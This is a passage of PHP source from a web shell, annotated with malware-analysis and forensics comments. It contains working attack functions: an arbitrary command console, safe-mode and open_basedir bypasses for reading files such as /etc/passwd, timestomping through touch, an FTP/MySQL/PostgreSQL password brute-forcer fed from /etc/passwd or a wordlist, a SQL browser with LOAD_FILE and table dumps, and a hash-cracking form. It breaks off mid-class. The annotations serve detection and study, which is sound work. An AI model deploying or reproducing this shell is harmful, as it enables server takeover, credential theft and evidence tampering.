 * The AJAX branch mirrors actionPhp: output is HTML-escaped, escaped again
 * for a JS string literal, and returned length-prefixed.
 *
 * The hash form posts the entered value to external cracking services —
 * outbound egress from the victim's browser, not the server; several of the
 * listed domains are from 2009 and may no longer resolve.
 */
function actionStringTools() {
    // Fallbacks for builds lacking these. Note hex2bin here is NOT the
    // native hex2bin (bytes from hex): it yields a string of binary digits
    // (decbin of the numeric value), matching the "HEX to BIN" menu label.
    if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
    if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
    if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}

    if(isset($_POST['ajax'])) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        // Dynamic call: p1 names the function, p2 is its argument.
        if(function_exists($_POST['p1']))
            echo $_POST['p1']($_POST['p2']);
        $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'&#92;&#48;")."';\n";
        echo strlen($temp), "\n", $temp;
        exit;
    }
    printHeader();
    echo '<h1>String conversions</h1><div class=content>';
    // Menu label => function name; used only to render the <select>.
    $stringTools = array(
        'Base64 encode' => 'base64_encode',
        'Base64 decode' => 'base64_decode',
        'Url encode' => 'urlencode',
        'Url decode' => 'urldecode',
        'Full urlencode' => 'full_urlencode',
        'md5 hash' => 'md5',
        'sha1 hash' => 'sha1',
        'crypt' => 'crypt',
        'CRC32' => 'crc32',
        'ASCII to HEX' => 'ascii2hex',
        'HEX to ASCII' => 'hex2ascii',
        'HEX to DEC' => 'hexdec',
        'HEX to BIN' => 'hex2bin',
        'DEC to HEX' => 'dechex',
        'DEC to BIN' => 'decbin',
        'BIN to HEX' => 'bin2hex',
        'BIN to DEC' => 'bindec',
        'String to lower case' => 'strtolower',
        'String to upper case' => 'strtoupper',
        'Htmlspecialchars' => 'htmlspecialchars',
        'String length' => 'strlen',
    );
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
    foreach($stringTools as $k => $v)
        echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
        echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
    if(!empty($_POST['p1'])) {
        // Same dynamic call as the AJAX branch, with escaped output.
        if(function_exists($_POST['p1']))
        echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo"</pre></div>";
    ?>
    <br><h1>Search for hash:</h1><div class=content>
        <form method='post' target='_blank' name="hf">
            <input type="text" name="hash" style="width:200px;"><br>
            <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
            <input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"><br>
            <input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>
            <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
            <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br>
        </form>
    </div>
    <?php
    printFooter();
}
 699 
/**
 * "File tools" page: per-file operations on the path in POST p1.
 *
 * p1 is the target path (url-decoded here a second time, on top of PHP's own
 * POST decoding), p2 the sub-action (view, highlight, download, hexdump,
 * edit, chmod, rename, touch, mkfile) and p3 the sub-action's argument.
 * download and mkfile are handled before any HTML is emitted; download
 * streams the file and exits.
 *
 * Forensics notes grounded in this body:
 *  - `touch` rewrites both mtime and atime to any strtotime()-parsable value
 *    (timestomping), so those two timestamps on a host running this shell
 *    cannot be trusted; ctime is not set by touch(), so a ctime newer than
 *    mtime is the usual tell — TODO confirm on the target filesystem.
 *  - `edit` overwrites in place with file_put_contents; `download` sends the
 *    file gzip-encoded, so the bytes on the wire are not the file's bytes.
 *  - the Owner/Group line looks up the GROUP name from the owner uid (see
 *    the $gid assignment), so the group shown is wrong whenever uid != gid.
 */
function actionFilesTools() {
    if( isset($_POST['p1']) )
        $_POST['p1'] = urldecode($_POST['p1']);
    if(@$_POST['p2']=='download') {
        if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
            // gzip the response; filename in the header is the unescaped
            // basename of the requested path.
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
            if (function_exists("mime_content_type")) {
                $type = @mime_content_type($_POST['p1']);
                header("Content-Type: ".$type);
            }
            $fp = @fopen($_POST['p1'], "r");
            if($fp) {
                while(!@feof($fp))
                    echo @fread($fp, 1024);
                fclose($fp);
            }
        } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
            // Directory download is a stub: nothing is sent before exit.
        }
        exit;
    }
    if( @$_POST['p2'] == 'mkfile' ) {
        // Create an empty file only if the path is free, then fall through
        // into the editor for it.
        if(!file_exists($_POST['p1'])) {
            $fp = @fopen($_POST['p1'], 'w');
            if($fp) {
                $_POST['p2'] = "edit";
                fclose($fp);
            }
        }
    }
    printHeader();
    echo '<h1>File tools</h1><div class=content>';
    if( !file_exists(@$_POST['p1']) ) {
        echo 'File not exists';
        printFooter();
        return;
    }
    $uid = @posix_getpwuid(@fileowner($_POST['p1']));
    // NOTE: uses fileowner() rather than filegroup(), so this resolves the
    // owner uid through the group database.
    $gid = @posix_getgrgid(@fileowner($_POST['p1']));
    echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
    echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
    if( empty($_POST['p2']) )
        $_POST['p2'] = 'view';
    // Sub-action menu: files get the full set, directories only
    // chmod/rename/touch.
    if( is_file($_POST['p1']) )
        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
    else
        $m = array('Chmod', 'Rename', 'Touch');
    foreach($m as $v)
        echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
    echo '<br><br>';
    switch($_POST['p2']) {
        case 'view':
            // Raw read in 1 KiB chunks, HTML-escaped per chunk.
            echo '<pre class=ml1>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</pre>';
            break;
        case 'highlight':
            if( is_readable($_POST['p1']) ) {
                echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
                $code = highlight_file($_POST['p1'],true);
                echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
            }
            break;
        case 'chmod':
            // p3 is an octal digit string ("0755"); converted by hand.
            if( !empty($_POST['p3']) ) {
                $perms = 0;
                for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
                if(!@chmod($_POST['p1'], $perms))
                    echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
                else
                    die('<script>g(null,null,null,null,"")</script>');
            }
            echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
            break;
        case 'edit':
            if( !is_writable($_POST['p1'])) {
                echo 'File isn\'t writeable';
                break;
            }
            // Save only when p3 is non-empty (empty() also rejects "0");
            // the whole file is replaced, write errors are suppressed.
            if( !empty($_POST['p3']) ) {
                @file_put_contents($_POST['p1'],$_POST['p3']);
                echo 'Saved!<br><script>document.mf.p3.value="";</script>';
            }
            echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</textarea><input type=submit value=">>"></form>';
            break;
        case 'hexdump':
            // Whole file in memory; 32 bytes per row: offset / hex / printable
            // (NUL, TAB, LF, CR shown as spaces in the text column).
            $c = @file_get_contents($_POST['p1']);
            $n = 0;
            $h = array('00000000<br>','','');
            $len = strlen($c);
            for ($i=0; $i<$len; ++$i) {
                $h[1] .= sprintf('%02X',ord($c[$i])).' ';
                switch ( ord($c[$i]) ) {
                    case 0:  $h[2] .= ' '; break;
                    case 9:  $h[2] .= ' '; break;
                    case 10: $h[2] .= ' '; break;
                    case 13: $h[2] .= ' '; break;
                    default: $h[2] .= $c[$i]; break;
                }
                $n++;
                if ($n == 32) {
                    $n = 0;
                    if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
                    $h[1] .= '<br>';
                    $h[2] .= "\n";
                }
             }
            echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
            break;
        case 'rename':
            // p3 is the new path; on success the page reloads on it.
            if( !empty($_POST['p3']) ) {
                if(!@rename($_POST['p1'], $_POST['p3']))
                    echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
                else
                    die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
            }
            echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
            break;
        case 'touch':
            // Sets mtime AND atime to the parsed p3 value; the form is
            // pre-filled with the current mtime.
            if( !empty($_POST['p3']) ) {
                $time = strtotime($_POST['p3']);
                if($time) {
                    if(@touch($_POST['p1'],$time,$time))
                        die('<script>g(null,null,null,null,"")</script>');
                    else {
                        echo 'Fail!<script>document.mf.p3.value="";</script>';
                    }
                } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
            }
            echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
            break;
        case 'mkfile':
            // Only reached when the file already existed (otherwise p2 was
            // rewritten to 'edit' above); nothing to do.
            break;
    }
    echo '</div>';
    printFooter();
}
 852 
/**
 * "Safe mode bypass" page: six alternative file-read / directory-list paths
 * meant to work where safe_mode or open_basedir blocks the normal ones.
 * p1 picks the technique, p2 (and p3 for case 5) is its argument. All output
 * is buffered during the switch and then echoed into the page UNESCAPED
 * (see the final <pre>), so file contents are injected into the HTML as-is.
 *
 * Hardening note: every case relies on a legacy engine or extension quirk;
 * on a current PHP (safe_mode removed in 5.4) the settings being bypassed
 * largely no longer exist, but the reads themselves still work wherever the
 * underlying function is enabled.
 */
function actionSafeMode() {
    $temp='';
    ob_start();
    switch($_POST['p1']) {
        case 1:
            // Read via the compress.zlib:// stream wrapper into a temp file.
            // $test is never assigned, so tempnam() receives null and
            // presumably falls back to the system temp dir — TODO confirm.
            $temp=@tempnam($test, 'cx');
            if(@copy("compress.zlib://".$_POST['p2'], $temp)){
                echo @file_get_contents($temp);
                unlink($temp);
            } else
                echo 'Sorry... Can\'t open file';
            break;
        case 2:
            // Directory listing through glob() with a trailing wildcard.
            $files = glob($_POST['p2'].'*');
            if( is_array($files) )
                foreach ($files as $filename)
                    echo $filename."\n";
            break;
        case 3:
            // file:// read via cURL with an embedded NUL byte before this
            // script's own path — an old open_basedir check-vs-use trick.
            $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
            curl_exec($ch);
            break;
        case 4:
            // Reset safe_mode/open_basedir via ini_restore, then include()
            // the target — i.e. the target is executed as PHP, not just read.
            ini_restore("safe_mode");
            ini_restore("open_basedir");
            include($_POST['p2']);
            break;
        case 5:
            // Enumerate uids p2..p3 through posix_getpwuid, reconstructing
            // /etc/passwd lines without opening the file.
            for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                $uid = @posix_getpwuid($_POST['p2']);
                if ($uid)
                    echo join(':',$uid)."\n";
            }
            break;
        case 6:
            // Treat the path as an IMAP mailbox spec and dump message 1.
            if(!function_exists('imap_open'))break;
            $stream = imap_open($_POST['p2'], "", "");
            if ($stream == FALSE)
                break;
            echo imap_body($stream, 1);
            imap_close($stream);
            break;
    }
    $temp = ob_get_clean();
    printHeader();
    echo '<h1>Safe mode bypass</h1><div class=content>';
    echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
    // Captured output goes into the page without htmlspecialchars.
    if($temp)
        echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
    echo '</div>';
    printFooter();
}
 905 
/**
 * Review note (malware analysis): interactive command console of this web shell.
 * Reached through the `call_user_func('action' . $_POST['a'])` dispatcher at the bottom
 * of the file (a=Console). p1 carries the command line; it is handed to ex(), which is
 * defined elsewhere in this file and whose return value is printed as the command's output
 * (presumably a wrapper over whatever execution primitive is available — not visible here).
 * There is no validation of p1 and no authorisation beyond the session flag set at login.
 * Defensive relevance: the emitted JavaScript fragments ("document.cf.output.value+=",
 * "document.cf.cmd.value=''"), the session key md5(HTTP_HOST).'ajax' and the AJAX response
 * shape "<byte length>\n<javascript>" are stable artefacts of this shell family and are
 * usable for file-based and web-log detection.
 */
function actionConsole() {
    // AJAX path: execute the command and return a JavaScript snippet that appends to the
    // console textarea, instead of rendering a full page (ajax=1 comes from the checkbox below).
    if(isset($_POST['ajax'])) {
        // Remembers the operator's preference for AJAX mode across requests.
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        echo "document.cf.cmd.value='';\n";
        // Command echo plus output, converted from the operator-chosen charset to UTF-8 and
        // backslash-escaped for a single-quoted JS string. addcslashes() reads its charlist
        // character by character, so "&#92;&#48;" does not mean backslash/zero here — it also
        // escapes '&', '#', ';' and the digits 2, 4, 8, 9 (an HTML-entity mistake carried over
        // from the original). If iconv() fails, $temp is false and nothing is appended.
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'&#92;&#48;"));
        // Emulates a persistent "cd": each ex() call runs separately, so a trailing
        // "cd <dir>" is applied to this PHP process instead and mirrored into the
        // file-manager form field (document.mf.c). $GLOBALS['cwd'] is echoed unescaped.
        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    {
            if(@chdir($match[1])) {
                $GLOBALS['cwd'] = @getcwd();
                echo "document.mf.c.value='".$GLOBALS['cwd']."';";
            }
        }
        echo "document.cf.output.value+='".$temp."';";
        echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
        $temp = ob_get_clean();
        // Response format consumed by the client-side a() helper: length, newline, JS body.
        echo strlen($temp), "\n", $temp;
        exit;
    }
    // Full-page path.
    printHeader();
    // Inline JavaScript: in-page command history for the console input (arrow up/down).
?>
<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
    var n = (window.Event) ? e.which : e.keyCode;
    if(n == 38) {
        cur--;
        if(cur>=0)
            document.cf.cmd.value = cmds[cur];
        else
            cur++;
    } else if(n == 40) {
        cur++;
        if(cur < cmds.length)
            document.cf.cmd.value = cmds[cur];
        else
            cur--;
    }
}
function add(cmd) {
    cmds.pop();
    cmds.push(cmd);
    cmds.push("");
    cur = cmds.length-1;
}
</script>
<?php
    // Console form. "clear" is handled client-side; any other input is submitted through
    // a() (AJAX) or g() (full page). Both helpers are defined elsewhere in the file — their
    // argument convention (action, cwd, p1, p2, ...) is inferred from the call sites here.
    echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
    // $GLOBALS['aliases'] (defined elsewhere in the file) maps a label to a preset command;
    // an empty command marks a group heading. The label $n is not HTML-escaped, the value is.
    foreach($GLOBALS['aliases'] as $n => $v) {
        if($v == '') {
            echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
            continue;
        }
        echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
    }
    // A non-AJAX submission that carried a command resets the remembered preference.
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
    // Non-AJAX execution: the command and its output are rendered (HTML-escaped) into the textarea.
    if(!empty($_POST['p1'])) {
        echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
    }
    echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
    echo '</form></div><script>document.cf.cmd.focus();</script>';
    printFooter();
}
 972 
/**
 * Review note: clears the per-host login flag — the md5(HTTP_HOST) session key that the
 * password check at the top of the file sets — and prints 'bye!'.
 * The PHP session itself is not destroyed, and the md5(HTTP_HOST).'ajax' preference key
 * written by actionConsole() is left in place.
 */
function actionLogout() {
    unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
    echo 'bye!';
}
 977 
/**
 * Review note: deletes the shell's own file (SELF_PATH, defined at the top of the file as
 * __FILE__) when called with p1=yes; otherwise renders a confirmation link that re-invokes
 * this action through the g() helper.
 * Forensics: a successful removal still leaves the request in the web-server log (the POST
 * body with a=SelfRemove usually does not appear there) and the fixed response strings
 * 'Shell has been removed' / 'unlink error!' in any captured traffic.
 * p1 is read without isset(); the resulting notice on newer PHP is hidden by the
 * error_reporting(0) at the top of the file.
 */
function actionSelfRemove() {
    printHeader();
    if($_POST['p1'] == 'yes') {
        // die() on success means printFooter() below never runs for that response.
        if(@unlink(SELF_PATH))
            die('Shell has been removed');
        else
            echo 'unlink error!';
    }
    echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
    printFooter();
}
 989 
/**
 * Review note (malware analysis): credential-guessing action of this web shell against an
 * FTP, MySQL or PostgreSQL service named in $_POST['server'] ("host:port"). Two modes:
 * type=1 reads local /etc/passwd and tries each account name as its own password (and,
 * with reverse=1, the name spelled backwards); type=2 reads a wordlist from the path in
 * $_POST['dict'] and tries every line against $_POST['login'].
 * As written only the FTP variant is functional: the mysql variant mangles its host
 * argument through operator precedence (string concatenation binds tighter than ?:), the
 * pgsql variant builds $str but never uses it and references a $server variable that is
 * not in its scope, and mysql_* has been removed since PHP 7.0. An unknown proto value
 * leaves bruteForce() undefined and the call below is a fatal error.
 * Defensive relevance: bursts of failed logins on ports 21/3306/5432 originating from the
 * web-server account, reads of /etc/passwd by the web server process, and the fixed
 * strings 'FTP bruteforce', 'komsen', 'passwd.dic' and "Attempts:/Success:" in responses.
 */
function actionBruteforce() {
    printHeader();
    if( isset($_POST['proto']) ) {
        echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
        // bruteForce() is declared conditionally per protocol; a function declared inside a
        // function only exists once this branch has executed.
        if( $_POST['proto'] == 'ftp' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $fp = @ftp_connect($ip, $port?$port:21);
                if(!$fp) return false;
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif( $_POST['proto'] == 'mysql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                // Precedence: the condition of ?: is the whole "$ip:$port" string, so the
                // host argument is just $port (or 3306) and $ip is never contacted.
                $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif( $_POST['proto'] == 'pgsql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                // $str is assembled with unquoted credentials but never used; $server is
                // undefined in this scope and pg_connect() does not take (host, user, pass).
                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
                $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        if($_POST['type'] == 1) {
            // Local account names double as the candidate list; $line[0] is the user field.
            $temp = @file('/etc/passwd');
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@$_POST['reverse']) {
                        // Builds the reversed account name one byte at a time.
                        $tmp = "";
                        for($i=strlen($line[0])-1; $i>=0; --$i)
                            $tmp .= $line[0][$i];
                        ++$attempts;
                        if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                            $success++;
                            echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        } elseif($_POST['type'] == 2) {
            // Wordlist mode: one candidate per line, read from an operator-supplied path.
            $temp = @file($_POST['dict']);
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
    }
    // Input form; cwd, a and charset are carried as hidden fields so the shell state survives.
    echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
        .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
        .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
        .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
        .'<span>Server:port</span></td>'
        .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
        .'<tr><td><span>Brute type</span></td>'
        .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
        .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
        .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
        .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
        .'<td><input type=text name=login value="komsen"></td></tr>'
        .'<tr><td><span>Dictionary</span></td>'
        .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
    echo '</div><br>';
    printFooter();
}
1073 
/**
 * Review note (malware analysis): "Sql browser" action of this web shell. With
 * operator-supplied credentials (sql_host / sql_login / sql_pass / sql_base) it connects
 * to MySQL or PostgreSQL, lists databases and tables with row counts, pages through a table
 * (p1=select, p2=table, p3=page), runs an arbitrary statement (p1=query, p3=SQL), streams a
 * gzip-compressed dump of the ticked tables as dump.sql (p2=download, tbl[]), and reads
 * server-side files through MySQL's LOAD_FILE() (p1=loadfile, p2=path).
 * Portability: DbClass uses a PHP4-style constructor and the mysql_* extension. mysql_* was
 * removed in PHP 7.0, and PHP 8.0 no longer treats a same-named method as the constructor,
 * so on PHP 8 $this->type stays unset and every switch below falls through to `return false`.
 * each() (used in the listing loops) was removed in PHP 8.0 as well.
 * Defensive relevance: Content-Disposition filename dump.sql, the fixed query shapes
 * ("SELECT COUNT(*) as n FROM", "SELECT LOAD_FILE(", the pg_database / information_schema
 * listings, runs of SHOW TABLES and SHOW CREATE TABLE) issued from the web-server account
 * are stable indicators in database audit logs and proxies.
 */
function actionSql() {
    // Declared on first execution of actionSql(); a second call within one request would
    // fail with a class-redeclaration error (the dispatcher only calls one action per request).
    class DbClass {
        var $type;   // 'mysql' or 'pgsql', copied from $_POST['type']
        var $link;   // connection resource, or null until connect() succeeds
        var $res;    // result of the most recent query()/listDbs()/listTables()
        // PHP4-style constructor (same name as the class); not invoked as a constructor on PHP 8.
        function DbClass($type)    {
            $this->type = $type;
        }
        // Opens the connection; returns true on success, false on failure or unknown type.
        // pgsql expects "host:port" in $host (default 5432) and interpolates the credentials
        // unquoted into the conninfo string.
        function connect($host, $user, $pass, $dbname){
            switch($this->type)    {
                case 'mysql':
                    if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
                    break;
                case 'pgsql':
                    $host = explode(':', $host);
                    if(!$host[1]) $host[1]=5432;
                    if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
                    break;
            }
            return false;
        }
        // MySQL only: selects the default database (pgsql picks the database at connect time).
        function selectdb($db) {
            switch($this->type)    {
                case 'mysql':
                    if (@mysql_select_db($db))return true;
                    break;
            }
            return false;
        }
        // Runs $str verbatim and caches the result in $this->res (false on failure).
        function query($str) {
            switch($this->type) {
                case 'mysql':
                    return $this->res = @mysql_query($str);
                    break;
                case 'pgsql':
                    return $this->res = @pg_query($this->link,$str);
                    break;
            }
            return false;
        }
        // Fetches the next row as an associative array from the optional result argument,
        // defaulting to the cached $this->res; false when exhausted or on error.
        function fetch() {
            $res = func_num_args()?func_get_arg(0):$this->res;
            switch($this->type)    {
                case 'mysql':
                    return @mysql_fetch_assoc($res);
                    break;
                case 'pgsql':
                    return @pg_fetch_assoc($res);
                    break;
            }
            return false;
        }
        // Result set of database names (one column), stored in $this->res.
        function listDbs() {
            switch($this->type)    {
                case 'mysql':
                    return $this->res = @mysql_list_dbs($this->link);
                break;
                case 'pgsql':
                    return $this->res = $this->query("SELECT datname FROM pg_database");
                break;
            }
            return false;
        }
        // Result set of table names in the current database, stored in $this->res.
        function listTables() {
            switch($this->type)    {
                case 'mysql':
                    return $this->res = $this->query('SHOW TABLES');
                break;
                case 'pgsql':
                    return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
                break;
            }
            return false;
        }
        // Last driver error message for the connection.
        function error() {
            switch($this->type)    {
                case 'mysql':
                    return @mysql_error($this->link);
                break;
                case 'pgsql':
                    return @pg_last_error($this->link);
                break;
            }
            return false;
        }
        // Sets the connection charset. Defect carried over from the original: the second
        // case label is 'mysql' again instead of 'pgsql', so the pg_set_client_encoding()
        // branch is unreachable.
        function setCharset($str) {
            switch($this->type)    {
                case 'mysql':
                    if(function_exists('mysql_set_charset'))
                        return @mysql_set_charset($str, $this->link);
                    else
                        $this->query('SET CHARSET '.$str);
                    break;
                case 'mysql':
                    return @pg_set_client_encoding($this->link, $str);
                    break;
            }
            return false;
        }
        // Prints a SQL dump of one table: the CREATE statement (mysql only) followed by one
        // INSERT per row. $table comes straight from tbl[] in the POST and is interpolated
        // unquoted; only the cell values are escaped. Always returns false.
        function dump($table) {
